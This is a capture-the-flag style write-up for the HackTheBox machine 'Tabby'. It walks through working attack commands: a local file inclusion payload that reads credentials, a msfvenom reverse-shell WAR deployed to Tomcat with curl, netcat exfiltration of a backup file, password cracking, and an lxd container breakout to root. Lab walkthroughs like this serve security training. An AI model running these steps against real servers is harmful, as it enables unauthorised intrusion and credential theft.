HackThebox: Tabby Writeup

Ashutosh Gupta
7 min readNov 8, 2020

Hello cyber geeks! I am back with another writeup. This time I have made a walkthrough of Hackthebox machine name tabby(linux).

So let’s get start this:

Reconnaissance:

Let start the recon with nmap.

nmap -sC -sV -oN nmap.txt 10.10.10.194

# Nmap 7.91 scan initiated Sat Nov  7 20:03:51 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 7 20:04:27 2020 -- 1 IP address (1 host up) scanned in 36.75 seconds
  • -sC: run default nmap scripts
  • -sV: detect service version

As you can see there are three ports open:

  • Port 22: ssh
  • Port 80: Apache
  • Port 8080: Tomcat

Let’s start this with port 80. Now open the ip in browser. And there you will see this

So it’s look like hosting. If you enumerate the website you will found nothing as suspicious. So let’s click on the NEWS. And there you will get error. So if you notice the URL it is megahosting.htb. So you have to add the ip in your host.

nano /etc/hosts

So after refreshing the tab you will see some text like apologize and all. If you will check the source code you will find nothing. Now if you will notice the url it says “http://megahosting.htb/news.php?file=statement”.

Are you thinking the same what I am thinking? Yeah let’s try LFI. So this the link for exploits of LFI.

So I tried the basic one. http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd. And BOOM!! it was vulnerable.

So you can’t get much more things from this. Let’s try to see the another port i.e 8080. So if you open that in browser it looks like this.

As you can see tomcat9 is running. Now if find exploit for tomcat9 no one will work. Let’s see the directories and files on port 8080.

└─$ gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x txt,php,html,css 2>/dev/null

So if you open docs you will find the documentation of tomcat and in manager you will get the login page.

Let’s see how we can exploit the tomcat.

With the help of msfvenom we can make a payload for revershell.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4  lport=1256 -f war -o shell.war

So for uploading the shell we have to find the credentials of manager. If you try the default credentials of tomcat it won’t work. Let’s see the where credentials are stored. So here first we need to understand its directory structure of tomcat.

So password are stored in /usr/share/tomcat9/etc/tomcat-users.xml. Now we can access this using LFI.

http://megahosting.htb/news.php?file=../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

Now check the source code you will find the creds.

username="tomcat" password="$3cureP4s5w0rd123!"

Now if you try to login in /manger you will get error. As we have credentials we can upload the shell. But if try to login with the credentials it will give the error. With the help of curl we can also upload the shell

curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/tabbyhack-shell'

So now we have to open a listener and then open the file in the browser. I used netcat listener.And then open the file http://10.10.10.194:8080/tabbyhack-shell/

Whooh!!… we got the shell. Now we have to make interactive using python tty.

python3 -c 'import pty; pty.spawn("/bin/sh")'

As now we have to enumerate. So for this I use linpeas.sh

Now we have transfer the linpeas from out local machine to attacker machine.I used python http server for transferring files.

In local machine:
python -m SimpleHTTPServer 1226

You have to start this in the directory where linpeas is there.

In attacker machine:
wget http://your_tunnel_ip:1226/linpeas.sh

Then “chmod +x linpeas.sh” and “./linpeas.sh”

We got a user ash. And backup file.

As we can’t unzip that file in the attacking machine so we have to transfer the file from attacking machine to local machine.

In attacker machine:
nc -w 3 10.10.14.125 4444<16162020_backup.zip
In local machine:
nc -l -p 4444 >16162020_backup.zip

Now we have the zip file in our attacking machine now unzip that.

And it is asking for password and we don’t have password. Now we have to find the password for the file using john.

sudo zip2john  16162020_backup.zip > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

GETTING USER ACCESS:-

Then we got the password of the zip:- admin@it

So if you unzip the files which are in /var/www/html

So now we can try this as ssh password of user ash.

cat user.txt
b6658791046xxxxxxxxxxxxx (redacted)

GETTING ROOT ACCESS:-

So here we go with our usual command i.e id

But here lxd look’s suspicious!

So if you google that try to search then you will get this link.

So I have just copy and paste the commands told there and BOOM!! I am root.

In local machine:
1.git clone https://github.com/saghul/lxd-alpine-builder.git
2.sudo ./build-alpine
Then it will make one tar.gz file and you have to transfer this file into the attacker machine.

And now in attacker machine

In attacker machine:-
* wget http://10.10.10.2:1326/alpine-v3.12-x86_64-20200823_2015.tar.gz
* cp alpine-v3.12-x86_64-20200823_2015.tar.gz /home/ash
* lxc image import ./alpine-v3.12-x86_64-20200823_2015.tar.gz --alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh

So I am having error like already running because I am doing these commands twice. Now we have to cat the root.txt.

cd /mnt/root
cd root
cat root.txt

So the summary of root part is it is moving root folder into a container and then mount that container into machine.

So I hope you enjoyed while reading!!

--

--